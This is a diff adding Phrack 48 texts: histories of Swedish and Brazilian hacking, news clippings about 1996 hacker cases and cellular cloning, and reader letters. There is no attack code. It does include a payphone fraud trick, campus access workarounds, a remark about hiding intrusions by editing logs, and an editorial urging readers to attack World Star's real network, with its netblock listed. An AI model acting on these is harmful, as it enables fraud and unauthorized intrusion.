+came out as a result of general attention focused upon the computers vs.
+privacy matter in 1973. As Sweden was one of the first countries to make
+use of computers in governmental administration, and as Swedish
+authorities were eager to register every possible piece of information,
+some politically influential individuals started a debate resulting in
+the founding of the Computer Act and the Computer Inspection Department.
+As a result Sweden is light years ahead of most countries when it comes
+to privacy matters. For example there is no problem in having the number
+identification possibilities on your line deactivated for good, and it
+won't cost you anything. You can also easily obtain free printouts from
+any computer register containing information on you, including the
+register at your local AXE-exchange.
+
+To sum this article up I can draw the conclusion that even Sweden has
+had its handful of bright hackers, each category bringing their straw to
+the stack. Even though Swedish officials and companies would hardly
+admit it, these hackers have obviously been very important for this
+country, at least in forcing system managers, security officials,
+software producers, policemen, politicians and so on to think things
+over. Sweden has also attracted outside attention in some cases, and
+will probably keep doing so. If you should pin- point one group that has
+meant more to the Swedish scene than any other, it wouldn't be any of
+the H/P groups, but rather the cracking pioneers Fairlight - a well
+organized and world-famous warez producer.
+
+Linus Walleij aka King Fisher / Triad
+triad@df.lth.se
+
+(Some handles have been changed to protect retired Swedish hackers from
+luser mail.)
+
+Swedish readers may be interested in the fact that I'm currently writing
+a lengthy text in Swedish (a book actually) providing a closer look at
+Swedish hacking history, which will be released on hypertext and ASCII
+sometime later this year. Over and out from Sweden!
+
+---------------------------------------------------------------------------
+
+                           HACKING IN BRAZIL
+                           =================
+
+Before talking about hacking here, it's good to describe the conditions
+of living. Right now, the country is a mix of Belgium and India. It's
+possible to find both standards of living without travelling long
+distances. The Southern part of the country concentrate most of the
+industry, while in the west one can find Amazonia jungle. There are many
+Brazils, one could say.
+
+        Beginning with the hacking and phreaking.
+
+Hackers and computers enthusiasts have several different places for
+meeting. When this thing started, by the time of that film "Wargames",
+the real place  to meet hackers and  make contacts were the computer
+shops, game-arcades and "Video-texto" terminals. The computer shops were
+a meeting place because many of those "hackers" had no computers of
+their own and the shop-owners  would let them play with them as part of
+a advertising tool to  encourage people buying it for their kids.
+
+Today that is no longer needed, since prices dropped down and people
+make a team already at schools or sometimes just join a BBS (most people
+who buy a modem, end up thinking about setting up a BBS). By the way,
+most schools are advertising computer training as part of  their
+curricula, to charge more, and like everywhere, I guess, people no
+longer learn typewriting, but computer-writing, and many brazilian
+newspapers dedicate a section on computer knowledge once a week, with
+advertising, hints, general info and even lists of BBS's.
+
+A few years ago, the "Video-texto" terminals were also big meeting
+places. That was part of  a effort to make popular the use of a
+computer linked by modem to  get services like msx-games, info on
+weather, check bank account and so on. Just like the Net,  one could do
+e-mail, by some fancy tricks and other  things that could be  called
+hacking. The difference was that it was made by the state-owned
+telephone company and each time the trick was too well know, it was
+changed. The only way to keep in touch was keeping in touch with the
+people who used the system like hell. It's no different than what it
+happens with the computer gurus. The protocol used for that, X-25 is the
+same used for the banking money transfers, but don't think it was
+possible to do anything more than checking how much money one had and a
+few other classified data. People who used that at home (not too many,
+since the company didn't think it would be such a hit, and didn't
+provide for it) could spend their fathers money discovering funny things
+about the system, like messing with other people's phones and so.  One
+could also  use the terminals at the Shopping Centers to make phone
+calls to their friends without paying. The guy at the other end would be
+heard by the small speaker.
+
+Phreaking here in Brazil is something secret. Apart from the trick
+described in the section "Letters to read by" at the summer 1994 of the
+2600 Magazine, where one would call through locked rotatory telephone,
+little is known about phreaking. One thing is that people who enrolled
+in Telecommunications Engineering could call Europe and USA with ease,
+but they would not tell you how. It must be said that all public phones
+have metal cables  around the cables and that the phone machines are
+quite tough to break down. I guess it wasn't for beauty.
+
+The phones use some sort of metal coins called fichas, which must be
+bought somewhere. The trick is to use a coin with a string, so it would
+not be collected. But if the police caught... The police doesn't follow
+rules about that. Either they put a fine on the guy for that, or arrest
+him for vandalism or anything else they think of at the moment. It is
+hassle, anyway. My friend who was doing electrical Engineering told me
+that boxing in Brazil was impossible. The system is just not good enough
+to be boxed. Another friend of mine told me that in the Northeast part,
+where people are a little bit different and more easy-going, the phone
+system can be boxed, because some top-brass asked the company to let
+that  feature implemented. The Phone company doesn't admit any knowledge
+about that.
+
+Internet access is something quite hard to get today. Until a few weeks
+ago, the system would not let the creation of a Internet site that was
+not part of some research project. So, only Universities and like were
+capable of putting people in the Net Universe. In the University of Sco
+Paulo, people in the post-graduation courses could get it with ease, but
+graduating students would have to show some connection to a research
+project. That in theory, because the students found out that one could
+use the IBM CDC 4360 to telnet without a Internet account. Also, all the
+faculties that had computer rooms full of AT 386 which where linked by
+fiber optics to this computer.  Another one did the file transfers
+between the accounts and the computer at the computer rooms  and that
+ftp was also possible without an account, but only to a few sites, like
+oakland and so. That lasted for about a year, until that thing was
+fixed in the router, but only at the Politechnik School. Says the legend
+that the guys were downloading too much GIF and JPG pictures of Top
+Models from a ftp site nearby. That spent so much bandwidth that the
+site started to complain and both things happened: the site stopped to
+store GIF's of wonderful women in swimsuit and the router was fixed to
+prevent ftp without a Internet account. One can still today connect the
+outside world via telnet and many people have accounts in Internet BBS
+like Isca BBS, Cleveland Freenet and like. The Bad Boy BBS was "in",
+until  it went out of business. This kind of access is not good, though,
+for it is very slow, sometimes. Also, it is hard to  download something
+bigger than 60 kbyte.  The way I devised, downloading the file inside
+the bbs and uuencoding it. This way you could list the file and capture
+the screen listing, uudecode it after some editing and have a working
+.exe or .zip file.
+
+By these means one could, inside the Campus, do all downloading one
+wanted,  from anywhere in the world. Outside the campus, it is  possible
+to do it by phone lines, but: the Modem will not go faster than 2400
+without character correction  (no Zmodem at all). Which makes quite hard
+to download compressed files. One could  an account:  that  would be
+possible by these means, but the amount of trash during the phone
+connection would make it real hard to type in passwords and like. To try
+doing any kind of  thin g but reading letters by modem is some kind of
+torture. The real thing is to do it by "linha dedicada", a special line
+for computer transmission. It's much more expensive though, but if you
+have the money to spend with that...
+
+Perhaps the best way to get access to an Internet account though is to
+be part of the research project "Escola do Futuro" that among other
+things get schools linked by the Net. That's what I did and they pay me
+quite well to search for data in the Net, for  the students of those
+schools. The University of Campinas is said to give all students a
+Internet account regardless of knowledge of what-it-is, as soon as the
+guy(girl) gets in. Of course here there's BITNET also. That's doomed for
+extinction, but this or  that reason keeps people from closing it down.
+Most teachers use it, guess there's even some post-graduation work
+written about that. It's easier to access via modem, also. Old habits
+die hard.
+
+Outside the Campus, for common people, there are few opportunities. The
+only thing you can get, at least until the opening of commercial
+internet sites, something about to happen one of these days, is access
+by mail. You join one BBS with Internet access, and your mail is sent by
+a Internet account later during the  day. This is not a direct access,
+as one can see,  but it's a easy way to access by modem. Problem is that
+you have to pay if you use it too much. The BBS's that do it don't do it
+for free, also. Connection to the Compuserve is also possible, but it
+also costs a lot of money, for my point of view.
+
+Because of the newspapers, the knowledge about Internet is spreading
+fast and the number of sites is growing the same way everywhere else in
+the world. Even the military people are starting with it. There are plan
+s to enhance it and make better connections, and some informative
+material is being translated in Portuguese, like "Zen and the Art of
+Internet" and made available in the gopher.rnp.br. There are many
+mirrors from many famous sites, like Simtel20 and at least one Internet
+BBS, the "Jacare BBS" (Alligator bbs, available by telnetting
+bbs.secom.ufpa.br - 192.147.210.1 - login bbs. World Wide Web sites are
+becoming sort of popular also, but still available only to a few people
+who are lucky enough to get the access. Brazilian hackers are not very
+fond  of sharing the knowledge of how to get access and other things,
+sometimes because of fear of losing it, sometimes because the greed of
+it would overcharge the system. There's no hacker magazine here, yet,
+and very few people confess their curiosity about hacking for knowledge
+for fear of not finding jobs. Anyway most would-be hackers either get a
+job and stop hacking for fun or keep their activities secret in order to
+pursue their objectives.
+
+Today, Brazilian Hacker Underground did change a little. Lots of
+magazines, dealing only with Internet Issues, are being published. There
+is a hacker zine, the now famous "Barata Eletrica". This and the hacker
+list I created is starting to unite the computer rats, here. But I had
+to stop hacking in order to write the e-zine. Too famous to do that.
+Another guy just started the thing. He did not learn with my mistake and
+is signing it with his name, also. Received lots of letters, even as far
+as Mozambique, praising the material, which is very soft, for fear of
+losing my net access. Twice my account was "freezed". The people at my
+site are paranoid. Suffered too much from break-ins already. Most BBS's
+are trying to turn themselves in Internet providers or else, to get
+e-mail access. There was a fear the State would control the thing, like
+they did with the Phone system. Can any of you guys imagine what it is,
+to pay 4.000 US$ dollars for a phone line? In the City of Sao Paulo,
+(look like L.A., one can say), that's the average price. Cellular is
+cheaper. Motorola rules. The public phone system was changed again. No
+more "fichas". At least for long distance calls. It's a small card that
+looks like plastic one side and magnetic material in the other. m still
+trying to do 2600 meetings. Oh, once in a while, there is a break-in
+here and there, and a hacker is interviewed in TV, but people are only
+now making the difference between the good guys (hackers) and the  bad
+guys (crackers). With Win95, people are losing fear of exchanging
+virus-sources files. The lack of philes in Portuguese makes it dificult
+for people to learn about hacking. People who know about it, don't have
+enough time to write. I started to unite some guys to do a translation
+of "hacker crackdown", but that's another story. I shortened the name of
+the book to "crack.gz". Guess what's happened? My account is blocked up
+to this day. They told me I'll get my access back. One of these days.
+One of these days I'll re-write this article, and tell the whole thing
+in detail.
+
+Any Portuguese speaker that does not know about my e-zine,
+try a ftp.eff.org mirror. The URL:
+ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica
+
diff --git a/phrack48/18.txt b/phrack48/18.txt
new file mode 100644
index 0000000..368bc03
--- /dev/null
+++ b/phrack48/18.txt
@@ -0,0 +1,453 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 18 of 18
+
+              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+
+Security Software Thwarts Hackers                               July 23, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(PRNewswire)
+
+World Star Holdings, Ltd. announced today that there have been approximately
+5,000 unsuccessful attempts to break its proprietary VPAGE Internet security
+system.  In order to further demonstrate the functionality of its technology,
+they Company has unveiled a new addition to the World Star Internet security
+challenge:  "The World Star Cyberhospital."
+
+The company recently launched an online contest offering more than $50,000 in
+cash and prizes to the first person to break its security.
+
+[ THESE CHALLENGES ARE UNADULTERATED BULLSHIT.  Phrack suggests you test
+  something other than the fake, non-production demo contest system.  How
+  well does their software hold up in a real business environment?
+  (in other words:  THEIRS!?!!@$)
+
+     World Star Holdings (NET-WORLDSTAR-MB-CA)
+     165 Garry Street
+     Winnipeg, Manitoba R3C 1G7
+     CA
+
+     Netname: WORLDSTAR-MB-CA
+     Netnumber: 205.200.247.0 ]
+
+-----------------------------------------------------------------------------
+
+Your Cellular Phone Number May Be Up For Grabs                August 21, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Mimi Whitefield (Miami Herald)
+
+
+Electronic bandits have snatched cellular phone numbers from the airwaves and
+cloned phones used by the Miami office of the Secret Service.
+
+BellSouth Florida president Joe Lacher's phone has been cloned; Spero Canton,
+spokesman for BellSouth, has been a victim three times over.
+
+"The bums never sleep.  They're everywhere," complained Bill Oberlink,
+regional president for AT&T Wireless Services.
+
+But the good news is that law enforcement agencies and cellular companies
+themselves are fighting back with a new arsenal of tools, technology and laws
+that make it easier to detect and prosecute cellular bandits.
+
+-----------------------------------------------------------------------------
+
+Miami Fraud Squad Pursues Cellular Bandits                    August 12, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Audra D.S. Burch (Miami Herald)
+
+How's this for capitalism gone awry:  Metro-Dade police nabbed a cellular
+bandit who was selling a $150 package deal -- $75 each for a stolen phone
+and number -- along with a 30-day guarantee on unlimited illegal air time.
+ 
+In a sting operation, police took him on the cut-rate offer.
+
+Thanks to the work of a special Metro-Dade Police Economic Crimes Bureau, the
+entrepreneurial cloner got a prison sentence.
+
+-----------------------------------------------------------------------------
+
+Newer Technology Aids Fight Against Cellular Fraud            August 21, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Mimi Whitefield (Miami Herald)
+
+New technology is on the side of cellular companies fighting telecom criminals
+who can rack up thousands of dollars in illegal charges before a consumer even
+knows he's been hit.
+
+New Jersey-based Bellcore, for example, has developed NetMavin software,
+which can detect fraudulent or unusual calling patterns within half an hour.
+
+"This is really going to screw the cloners up," said Roseanna DeMaria, an
+AT&T Wireless executive.
+
+-----------------------------------------------------------------------------
+
+SPA Files Copyright Suit                                        July 28, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~
+(Reuters News)
+
+The Software Publishers Association said Sunday it filed a civil copyright
+infringement lawsuit against a Seattle man for illegal distribution of
+software on the Internet.
+
+The suit, which was filed July 23 in the U.S. District Court in Seattle,
+alleges that Max Butler illegally uploaded copyrighted software to a file
+transfer protocol site for distribution across the Internet, the trade
+association said.
+
+"This action is a warning to Internet users who believe they can infringe
+software copyrights without fear of exposure or penalty," said Sandra
+Sellers, Software Publisher's vice president of intellectual property
+education and enforcement.
+
+-----------------------------------------------------------------------------
+
+The L0pht                                                        August, 1996
+~~~~~~~~~
+by Steve G. Steinberg (Wired) p. 40
+
+What do a group of hackers do when the equipment they've accumulated over
+years of dumpster diving no longer fits in their apartments?  They get
+a l0pht.  Since 1993, a core group of seven Boston-based hackers have rented
+a loft space for hacking, trading information about cellular phones security,
+and building things like a wireless Internet service using discarded
+microwave equipment.
+
+Now that all of them have day jobs in the industry, why do they keep at it?
+"For the girls and the text files, of course," says Mudge.
+
+[ HELL YES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ]
+
+-----------------------------------------------------------------------------
+
+Cracking Down on the Outlaws of Cyberspace                       July 2, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by M.J. Zuckerman (USA Today) p. 4B
+
+
+What's it take to be America's top cybercop?
+
+"I was a hockey referee, so I'm used to being beaten up," suggests Jim
+Christy, who is among those most often mentioned for the title.  And he's
+been at it for only a decade.
+
+Today, with the weighty title of Chief of Computer Crime Investigations
+and Information Warfare, he is one of 68 computer investigators in the
+Air Force Office of Special Investigations (OSI).
+
+Christy, a Baltimore native, stumbled into the computer field.  After
+drawing No. 35 in the draft lottery during the Vietnam War, he joined the
+Air Force rather than waiting to be drafted.  He spent the next four years
+as a computer key punch operator, followed by 13 years as a civilian working
+computers at the Pentagon.
+
+When he moved to OSI, Christy largely ceased his hands-on involvement with
+computers and systems.
+
+Since last fall, Christy has been on temporary assignment to the Senate
+Permanent Subcommittee on Investigations, helping them examine security
+in cyberspace.
+
+"I like working up on Capitol Hill, because you can make a difference,"
+Christy says.
+
+-----------------------------------------------------------------------------
+
+
+Hackers Penetrate Justice Department Home Page                August 18, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(AP News Wire)
+
+Internet hackers infiltrated the Justice Department's home page
+yesterday, altering the official web site to include swasticas,
+obscene pictures and lots of criticism of the Communications Decency Act.
+
+The official web site, which was turned off by government technicians
+when it was discovered, was changed to read "United States Department of
+Injustice," next to a red, black and white flag bearing a swastika.
+
+The page included color pictures of George Washington, Adolf Hitler, and a
+topless Jennifer Aniston.
+
+[ A link to a copy of the page is it http://www.fc.net/phrack/doj ]
+
+-----------------------------------------------------------------------------
+
+Employment Prospect Grim for Hacker                           August 19, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(AP News wire)
+
+
+Employment prospects are grim for Kevin Lee Poulsen, a computer whiz
+imprisoned five years for his cyberspace havoc.
+
+The 30-year-old hacker has been barred from getting near a computer for the
+next three years and he now fears selling cowboy boots at a Western store
+will be his only opportunity to make some money.
+
+"It's the only place where I've been greeted with a positive attitude," he
+said during an interview last week.  "I can't get a job that I am qualified
+for, basically."
+
+On September 3, he goes to federal court in hopes of having some of the
+computer restrictions relaxed.
+
+-----------------------------------------------------------------------------
+
+School Hires Student To Hack Into Computers                   August 22, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(The Sun Herald)
+
+Students at Palisades Park's high school needed their transcripts to
+send off to colleges.  But they were in the computer and no one who knew
+the password could be reached.  So the school hired a 16-year-old hacker
+to break in.
+
+Superintendent George Fasciano was forced to explain to the School
+Board on Monday the $875 bill for the services of Matthew Fielder.
+
+-----------------------------------------------------------------------------
+
+Feds aim low on hacker crackdown                                June 21, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Lewis Z. Koch (Upside Online News)
+
+Nineteen-year-old Christopher Schanot of St. Louis, Mo. has been
+languishing in a Federal jail since March 25, 1996, charged with four
+counts of computer hacking. He is not allowed to post bond, because
+Federal authorities contend he is "a computer genius intent on
+infiltrating computer systems of some of the largest companies and
+entities in the country," and because a jailhouse snitch claims Schanot
+bragged he would run away if he were released. He has never been charged
+with a crime or arrested before. 
+
+Schanot's problems began after he ran away from home on May 30, 1995,
+taking some of his disks, a hard drive and personal items. According to a
+knowledgeable source close to Schanot, Chris felt his parents, especially
+his father Michael, didn't understand or respect him. 
+
+Less rocky, it seems, was his relationship with Netta Gilboa, a
+38-year-old woman living near Philadelphia. Gilboa is editor-in-chief and
+publisher of _Gray Areas_, a slick, text-heavy, irregular magazine that
+explores the "grey areas" of "alternative lifestyles and deviant
+subcultures." 
+
+-----------------------------------------------------------------------------
+
+City of London Surrenders To Cyber Gangs                         June 2, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(Times of London)
+
+City of London financial institutions have paid huge sums to international
+gangs of sophisticated "cyber terrorists" who have amassed up to 400 million
+pounds worldwide by threatening to wipe out computer systems.
+
+A Sunday Times Insight investigation has established that British and 
+American agencies are examining more than 40 "attacks" on financial 
+institutions in London and New York since 1993.
+
+Victims have paid up to 13 million pounds a time after the blackmailers 
+demonstrated their ability to bring trading to a halt using advanced 
+"information warfare" techniques learnt from the military.
+
+According to the American National Security Agency (NSA), they have 
+penetrated computer systems using "logic bombs" (coded devices that can 
+be remotely detonated), electromagnetic pulses and "high emission radio 
+frequency guns," which blow a devastating electronic "wind" through a 
+computer system.
+
+The gangs are believed to have gained expertise in information warfare 
+techniques from the American military, which is developing "weapons" 
+that can disable or destroy computer hardware. Some are also known to 
+have infiltrated banks simply by placing saboteurs on their payroll as 
+temporary staff.
+
+-----------------------------------------------------------------------------
+
+Credit Fraud on AOL
+~~~~~~~~~~~~~~~~~~~
+(AP Newswire)
+
+Two boys posed as billing representatives for an online service and stole
+at least 15 credit card numbers, and used those numbers to buy $15,000
+worth of merchandise, from computer equipment to cymbals, police said.
+
+The two 16-year-olds were charged with 39 counts of possession of
+stolen property, theft and attempted fraud. They were released to the
+custody of their parents pending a Family Court hearing.
+
+Police believe the boys obtained a program designed by computer
+hackers to flimflam customers of America Online.  It sends a message to
+users saying they will be cut off if they don't type in their name,
+credit card account number and computer service password.
+
+-----------------------------------------------------------------------------
+
+FBI Survey Reveals Growth of Cybercrime                           May 6, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Rory J. O'Connor (San Jose Mercury News)
+
+Intruders are breaking into the nation's computer systems at an
+increasing rate and often with more nefarious motives than in the
+past, according to a survey co-sponsored by the FBI and a private
+group of computer security professionals.
+
+"What this shows is that the ante has been upped in cyberspace," said
+Richard Power, senior analyst of the Computer Security Institute in
+San Francisco, which conducted the survey. "As all manner of commerce
+moves into cyberspace, all manner of crime is moving there as well.
+It's no longer just vandalism."
+
+More than 40 percent of the 428 corporate, university and government
+sites that responded to the FBI survey reported at least one
+unauthorized use of their computers within the last 12 months, with
+some institutions reporting as many as 1,000 attacks in the period.
+
+It also appears that there's more computer crime for hire occurring,
+Power said, exploiting mainly older hackers who have graduated to
+making money off the skill they once used simply to establish bragging
+rights with their peers. He suggested that some of the hiring is being
+done by intelligence services of various governments, although he
+offered no proof.
+
+-----------------------------------------------------------------------------
+
+University hacker to be hunted on the Internet                 April 27, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Robert Uhlig (London Daily Telegraph)
+
+Computer experts at Cambridge University are using the Internet to hunt
+for a hacker who breached their security systems to access some of the
+world's most sensitive research information. 
+
+The authorities had no indication that the hacker deleted or altered
+files, "although there was the potential for that", he said. Files
+belonging to world-renowned research scientists may have been viewed or
+copied, giving the hacker an insight into commercially and academically
+sensitive material. 
+
+The hacker used a so-called sniffer program, which sat silently within the
+computer system for four weeks, monitoring its activities. This could
+allow the hacker to compile a list of all passwords to give him unhindered
+access to every computer on the university's network. "There was the
+potential to access any material on any computer anywhere on the
+university's network - ranging from electronic-mail to confidential
+research data," said Mr Stibbs. 
+
+-----------------------------------------------------------------------------
+
+Agents' Codes Exposed on Web                                   March 16, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By: Robert E. Kessler (Newsday)
+
+
+In an attempt to help (Ed) Cummings, and discredit the Secret Service, a Long
+Island-based hacker magazine last week launched a page on the World Wide
+Web publishing lists of Secret Service radio frequencies, photographs of
+agents, and codenames used by the agency for officials and buildings.
+
+Last year, Cummings, a 35-year-old native of Reading, Pa., pleaded
+guilty to federal charges in Philadelphia of possessing telecommunications
+equipment with intent to defraud and served a seven-month prison sentence.
+
+As a result of that conviction, last week Cummings was sentenced by a
+judge in Easton, Pa., north of Philadelphia, to serve a six- to 24-month
+sentence for violating probation after pleading no contest to a 1994 charge
+of tampering with evidence in another telephone hacking case.
+
+"Painting this guy as some white knight or someone who is standing up
+for free speech is wrong," said Kun. "He's engaged in fraud."
+
+Cummings' attorney, Kenneth Trujillo, could not be reached for comment.
+
+-----------------------------------------------------------------------------
+
+Judge Denies Bond to Accused Hacker                             April 6, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Tim Bryant (St. Louis Post Dispatch)
+
+After another prisoner said accused computer hacker Christopher Schanot was
+planning a quick escape from his parents' home near High Ridge, a federal
+magistrate decided Friday to keep Schanot in jail.
+
+"He said he would wait a couple of days and take off," testified the
+prisoner, Gerald Esposito.
+
+Schanot's lawyer, federal public defender Norm London, told Davis that
+the alleged conversation between the young man and Esposito never happened.
+
+London, pointing out that Esposito has convictions for sexual assault,
+said the older prisoner had "made overtures" to jail officials about moving
+Schanot into Esposito's housing area.
+
+-----------------------------------------------------------------------------
+
+Hacked Off! Government, Firms Fight Computer Intruders          April 7, 1996
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Colleen Bradford (St. Louis Post Dispatch)
+
+Every day, hundreds of people in front of personal computers try to sneak
+into corporate and government computer networks. Sometimes they just look
+around, sometimes they destroy data and sometimes they steal personal and
+classified information.
+
+Two weeks ago, law enforcement officials charged an Argentine, 21, with
+using the Internet to illegally break into computer networks at Department
+of Defense installations, the NASA, Los Alamos National Laboratory and
+several universities. The Justice Department is now seeking Julio Cesar
+Ardita, who accessed confidential research files on aircraft design, radar
+technology and satellite engineering.
+
+And Chris Schanot, 19, from High Ridge, was in court in St. Louis last
+week on charges of hacking. Schanot, who fled to Pennsylvania from St.
+Louis after graduating from Vianney High School last May, is accused in a
+five-count indictment of breaking into the computers of Southwestern Bell,
+Bell Communications Research, Sprint and SRI International, a research and
+development contractor with government contracts. His trial is set for June
+10.
+
+Schanot, like other hackers, likely became addicted to the feeling of
+power that cracking into a private computer network brings, said St. Louis
+County Police Sgt. Thomas Lasater, who has been investigating computer
+crime for seven years.
+
+"Normally these young hackers do not use the computers for financial
+gain," Lasater said. "It's just a challenge for them to see what they can
+conquer."
+
+-----------------------------------------------------------------------------
+
+Mike and Terry's Dreadful Adventure
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Elizabeth Weise (AP Newswire)
+
+Terry Ewing was late.  His plane left in an hour and he was cutting it close.
+But he couldn't tear himself away from his computer and the hole he'd hacked
+into the security network of Tower Records.
+
+He kept poking around, looking for something interesting to take to the
+hackers' convention he was going to.  Finally, five minutes before the
+airport shuttle beeped in front of his apartment, he downloaded a file
+containing 1,700 credit card numbers. 
+
+"We didn't expect anyone was watching," he said seven months later -
+through an inch of Plexiglas at the Sacramento County Jail. 
+
+Ewing had had second thoughts about taking the Tower Records file with
+him on July 31, so he left it on his hard drive while he and Kim hit
+DefCon, the biggest of the West Coast hacker gatherings, for a weekend of
+bragging, hanging out and messing around. 
+
+"We never guessed they were onto us.  Their security was so weak it
+really blew," the 20-year-old Kim says by phone from the sixth floor of
+the same jail that held his friend.  He is facing an 18-month sentence. 
+
diff --git a/phrack48/2.txt b/phrack48/2.txt
new file mode 100644
index 0000000..b9540a5
--- /dev/null
+++ b/phrack48/2.txt
@@ -0,0 +1,1237 @@
+                              ==Phrack Magazine==
+
+                   Volume Seven, Issue Forty-Eight, File 2 of 18
+
+                                Phrack Loopback
+
+-----------------------------------------------------------------------------
+
+        This is a response to the letter from KoV included in "Line Noise
+Part I" from Phrack #47.  After reading this open letter, I nearly died of
+laughter.  The inaccuracies of KoV's story were numerous and comical.
+However, from the way KoV presented themselves, they are acting as if
+it was their BBS network and a government conspiracy that has gotten
+them into trouble.  As a result, they will appear to many as a
+wrongfully persecuted group of computer users.
+
+        Apparently, KoV likes to fancy themselves as a group that
+spread "open-minded" and "sociopolitical" beliefs through their BBS
+network, KoVNet.  They claim that they "questioned [the] authority" of
+those who "tried to oppress [their] free-thinking minds."  They then
+state that this caused the "AmeriKKKan" government to monitor their
+actions, "stalk [them] in public places", and and attempt to destroy
+them "from the moment of KoV's conception."  
+
+        This is ridiculous.  First off, their BBS network was not
+enough to cause the government to stalk them in public.  If a BBS
+network that contains disdain for the American government justifies
+the stalking of its users, then NUMEROUS people in this country are
+currently being followed in public.  Therefore, KoV's claim about
+their threatening BBS network is an attempt to make 
+themselves look bigger and more important than they were.
+
+        Now, let us look at the real reason they are facing legal
+actions.  KoV is blaming "false accusations from a local university"
+for their troubles.  However, the accusations are not false and
+after you read what led them to be caught, you will reallize that KoV
+was never a threat to the government.
+
+        I do not know exactly how many universities they hacked.
+However, if it is one local university as they claim, it is Skidmore 
+in Saratoga Springs NY, the university which I attend.  I myself have played
+around with Skidmore's computers and do not feel any loyalty or
+patriotism to my school.  Therefore, it is not a grudge I am harboring
+against KoV for hacking Skidmore's system that is causing me to write
+this.  It is merely the fact that KoV is distorting the truth in an
+attempt to turn themselves into martyrs. 
+
+        Personally, I cannot blame anyone for breaking into Skidmore's
+system.  Since Skidmore was relatively new to the Internet, their
+security was very lax making it very easy to explore and play around
+with the system.  If KoV had any knowledge whatsoever, they would not have
+been caught or even detected by Skidmore.  It was their egos and lack
+of knowledge that led to their investigation.  I myself saw with my
+own eyes how they were detected.
+
+        The system that was hacked by KoV was wopr.skidmore.edu.
+Well, one day I took a look at the system logs for WOPR and saw "root
+login from [some out of domain ip address]" standing out quite well.
+If KoV was really so Knowledgable and dangerous, wouldn't they know how to
+edit system logs?  However, they did not which shows KoV is another
+example of people who managed to obtain root access and did not know
+what to do with it.
+
+        Some people would think, "Big deal! Just because they didn't
+edit the system logs does not mean that they could ever be linked to
+the crime."  This is very true.  However, this would have required KoV
+to keep their mouths shut about the incident.  Yet, they did not.
+Apparently, Lord Valgamon made a post to some of the BBS networks he
+frequented where he showed off about hacking Skidmore and told
+everyone how he did it.  
+
+        This hurt KoV greatly.  As a result, a narc on the BBS network
+alerted CERT about Lord Valgamon's claims who, in turn, reported the
+incident to Skidmore.  This caused Skidmore to now have a name, though
+anonymous, to apply to the break in.  Consequently, the proper
+authorities became involved and they began to track down Lord Valgamon
+on the BBS networks.
+
+        From the above facts, you can probably guess that the
+"AmeriKKKan" government would never have a special interest in KoV
+because they are the typical stereotype of an "ELiTE M0DeM d00d."  If
+Lord Valgamon and KoV had kept their mouths shut about the incident,
+they never would have been caught.  However, KoV needed to tell their
+ELiTE BBS scene how bad-ass they were and, as a result, their
+bad-asses are getting spanked hard.  
+
+        KoV had not done any crime or brought up any controversy
+against the government.  Their only crime was that they were stupid.
+I understand that KoV is now asking for the support of the h/p and
+political groups in the scene.  However, I would not recomend anyone
+to give them support.  There was no government conspiracy against KoV
+and everything that has happened to them was brought on by their own
+stupidity.  Do not turn a bunch of egotistical and immature criminals
+into martyrs.  I will end this with the same words KoV started their
+letter with: "Don't believe the hype." - Public Enemy.
+
+Sincerely,
+Mr. Sandman
+
+[ Wow.  Well, we always like to hear all sides to any story, and each
+  time something gets published that gets under someone else's skin, we
+  inevitably do.  Thanks for writing! ]
+
+
+-----------------------------------------------------------------------------
+
+Hello!
+
+Let me tell some words about myself. Computers and
+telecommunications take quite important place in my life. In
+past I worked as a programmer, system administrator and finally
+I ran my own business selling computer hardware (now I have
+closed this business because I have lost my interest for trade
+and due to some financial reasons). I owned my own BBS for
+several years but now I have it shut down because I do not want
+support lamers leeching files 2-3 years old and having no ideas
+what email is. Now almost every day I spent many hours reading
+Internet newsgroups, mainly dedicated to phreaking/hacking.
+
+A friend of mine, gave me some Phrack issues (newest was #42 of 1993).
+I have read them and like them very much.
+
+If it is possible, please drop me a line how could I subscribe
+to Phrack magazine. If you do, please encrypt your reply and
+send it via anonymous remailer, because now Russian government
+begun to control email messages very thoroughtly.
+
+I have private information from friend Internet provider about
+the FAPSI (Federal Agency of Government Communications and
+Information -- some form of Russian NSA/FCC hybrid formed from
+ex-KGB agents) actions aimed to control data passed through
+Internet channels in Russia. FAPSI ordered all Internet
+providers in St.Petersburg to install software which task will
+be to copy all messages addressed to/from persons which FAPSI
+interested in and to scan for some keywords specified by FAPSI.
+
+Providers will get their licences for providing communication
+service only after installing such spy software. There is a
+rumour that FAPSI has installed hidden microphones (bugs) in
+providers' offices to control any "illegal" activity (free
